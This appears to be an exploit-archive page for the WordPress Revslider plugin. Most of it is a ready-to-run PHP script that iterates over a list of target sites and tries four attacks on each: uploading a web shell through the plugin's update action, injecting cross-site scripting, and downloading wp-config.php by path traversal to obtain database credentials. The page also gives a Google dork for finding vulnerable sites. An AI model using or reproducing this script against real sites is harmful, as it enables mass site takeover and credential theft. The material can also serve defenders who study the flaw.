exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Revslider Arbitrary File Upload / Download / XSS

WordPress Revslider Arbitrary File Upload / Download / XSS
Posted Jun 23, 2015
Authored by CaFc Versace

WordPress Revslider plugin suffers from cross site scripting and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss
SHA-256 | 36a172246b28821efbbddd74fa15559539df7db7fe943afe36e9ba491cdc5324

WordPress Revslider Arbitrary File Upload / Download / XSS

Change Mirror Download
#####################################################################################
# Exploit Title : WordPress Revslider Arbitrary File Upload, Download & Cross Site Scripting
# Google Dork : inurl:"/wp-content/plugins/revslider/"
# Date : 21-06-2015
# Exploit Author : CaFc Versace
# Vendor Homepage : http://revolution.themepunch.com/
# Tested on : Windows 7
# Contact : cafc.versace[@]surabayablackhat.org; me[@]dwisiswanto.my.id
#####################################################################################


# Exploit & PoC :
-------------------------------------------------------------------------------------
<?php
/** me@dwisiswanto.my.id **/

/******************************************
First, install PHP CLI
USAGE: php exploit.php list-of-target.txt
******************************************/

$cafc = array(
"file"=>"revslider.zip", // enter a ur shell file into a zip
"xss"=>"<marquee>CaFc Versace was Here", // for xss
"kfg"=>"..\wp-config.php" // for download config
);

function hajar($yuerel, $dataAing=null) {
$cuih = curl_init();
curl_setopt($cuih, CURLOPT_URL, $yuerel);
if ($dataAing != null){
curl_setopt($cuih, CURLOPT_POST, true);
curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
}
curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
$eks = curl_exec($cuih);
curl_close($cuih);
return $eks;
}

$site = @file_get_contents($argv[1]);
$tumbal = explode("\r\n", $site);
echo "Calculate the target list : " . count($tumbal);
if (!isset($site)) {
echo "Site N/A.";
} else {
foreach ($tumbal as $uri) {
echo "\n------------------------------------";
echo "\nTarget => " . $uri;
echo "\n";
$menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => "update_plugin",
"update_file" => $cafc['file'])
);
$jason = json_decode($menta, true);
if ($jason['success'] == false || $jason['message'] == "Wrong request") {
echo "\nExploit [update_plugin] => NOT VULNERABLE";
} else {
echo "\nExploit [update_plugin] => SUCCESS";
echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
}

$menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => "get_captions_css",
"data" => $cafc['xss'])
);
$jasonB = json_decode($menta2, true);
if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
echo "\nExploit [get_captions_css] => NOT VULNERABLE";
} elseif ($jasonB['success'] == true) {
echo "\nExploit [get_captions_css] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_ajax_action&";
echo "client_action=get_captions_css";
echo "data=" . urlencode($cafc['xss']) . "\n";
}

$menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => $cafc['xss'])
);
$jasonC = json_decode($menta3, true);
if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
echo "\nExploit [xss] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_ajax_action";
echo "client_action=" . urlencode($cafc['xss']) . "\n";
} else {
echo "\nExploit [xss] => NOT VULNERABLE";
}

$menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_show_image",
"img" => $cafc['kfg']),
$uri);
if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
echo "\nExploit [wp-config] => NOT VULNERABLE\n";
} else {
echo "\nExploit [wp-config] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_show_image";
echo "img=" . $cafc['kfg'] . "\n";
}
}
}
?>
-------------------------------------------------------------------------------------


# Credits :
-------------------------------------------------------------------------------------
CaFc Versace
Thanks : Agency CaFc - Surabaya BlackHat
-------------------------------------------------------------------------------------


./learn to be better
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close